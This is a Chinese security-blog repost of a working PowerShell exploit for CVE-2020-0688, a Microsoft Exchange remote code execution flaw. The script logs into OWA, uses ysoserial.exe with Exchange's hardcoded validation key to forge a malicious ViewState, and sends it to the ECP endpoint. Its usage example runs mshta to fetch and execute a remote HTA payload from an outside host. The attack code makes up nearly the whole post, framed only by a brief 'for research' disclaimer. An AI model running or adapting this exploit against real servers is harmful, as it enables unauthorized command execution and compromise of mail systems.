CVE-2020-0688 powershell版

admin 2022年5月17日04:06:55安全博客评论35 views4117字阅读13分43秒阅读模式

专为没有python环境所用,需要ysoserial.exe 支持

2020-03-02-01-01-19

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
function exchange

{

param(

[alias("Help")][switch]$h=$false,
[alias("server")][String]$s,
[alias("username")][String]$u,
[alias("password")][String]$p,
[alias("command")][String]$c

)


$Help = "
CVE-2020-0688 EXP
Usage: exchange [-h] -s SERVER -u USER -p PASSWORD -c CMD
Examples:
exchange -s https://mail.x.com/ -u [email protected] -p passwd -c `"cmd.exe /c mshta http://1.1.1.1/test.hta`"
"
if(!$s){return $Help}
if(!$u){return $Help}
if(!$p){return $Help}
if(!$c){return $Help}
if($h){return $Help}




<#
$global:PSDefaultParameterValues = @{
'Invoke-RestMethod:Proxy'='http://127.0.0.1:8080'
'Invoke-WebRequest:Proxy'='http://127.0.0.1:8080'
'*:ProxyUseDefaultCredentials'=$true
}
$webproxy="http://127.0.0.1:8080"
$proxy = new-object System.Net.WebProxy
$proxy.Address = $webproxy
#>


[Reflection.Assembly]::LoadWithPartialName("System.Web") | Out-Null

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }

$url =$s
$target="$s/owa/auth.owa"
$destination=[uri]::EscapeDataString("$url/ecp/")

$username=$u
$pass=$p
$command=$c
$VIEWSTATEGENERATOR='B97B4E27'
$validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'



$postData="flags=4&password=$pass&destination=$destination&passwordText=&isUtf8=1&username=$username&forcedownlevel=0"


$CookieContainer = New-Object System.Net.CookieContainer




$buffer = [text.encoding]::ascii.getbytes($postData)

[net.httpWebRequest] $req = [net.webRequest]::create($target)
$req.method = "POST"
$req.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
$req.Headers.Add("Accept-Language: zh-CN,zh;q=0.9,en;q=0.8")
$req.Headers.Add("Accept-Encoding: gzip, deflate, br")
$req.Headers.Add("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7")
$req.Headers.Add("Origin: $url")
$req.Headers.Add("Sec-Fetch-Dest: document")
#$req.Proxy=$proxy
$req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"
$req.AllowAutoRedirect = $true
$req.MaximumAutomaticRedirections= 1
$req.ContentLength = $buffer.length
$req.TimeOut = 50000
$req.KeepAlive = $true
$req.CookieContainer = $CookieContainer
$reqst = $req.getRequestStream()
$reqst.write($buffer, 0, $buffer.length)
$reqst.flush()
$reqst.close()
[net.httpWebResponse] $res = $req.getResponse()
$SessionId=($res.Cookies['ASP.NET_SessionId']).value
$resst = $res.getResponseStream()
$sr = new-object IO.StreamReader($resst)
$result = $sr.ReadToEnd()
$res.close()
$l=($res.ResponseUri.LocalPath)
if ($l -like '/owa/auth/logon.aspx'){
write-host "[!] Login Incorrect, please try again with a different account..`n"
break
}
write-host "[+] Login successfully!`n`n"

write-host "Exec: .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug -islegacy`n"
$yso= .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug-islegacy
$generator=$yso -match "^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$"

$Encode = [System.Web.HttpUtility]::UrlEncode($generator)

write-host "[+] Exp url:" +"$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
$url2="$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
try {
[net.httpWebRequest] $req2 = [net.webRequest]::create($url2)
$req2.Method = "GET"
$req2.Accept = "text/html"
$req2.AllowAutoRedirect = $fals
#$req2.Proxy=$proxy
$req2.CookieContainer = $CookieContainer
$req2.TimeOut = 50000
[net.httpWebResponse] $res2 = $req2.getResponse()

#$resst = $res2.getResponseStream()
#$sr = new-object IO.StreamReader($resst)
#$result2 = $sr.ReadToEnd()
write-host "[-] Failed!"
}catch [System.Net.WebException] {
write-host "[*] Status code: 500, Maybe success!"
}


}
exchange

FROM :WOLVEZ'S BLOG| Author:wolve

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日04:06:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2020-0688 powershell版 http://cn-sec.com/archives/1012459.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: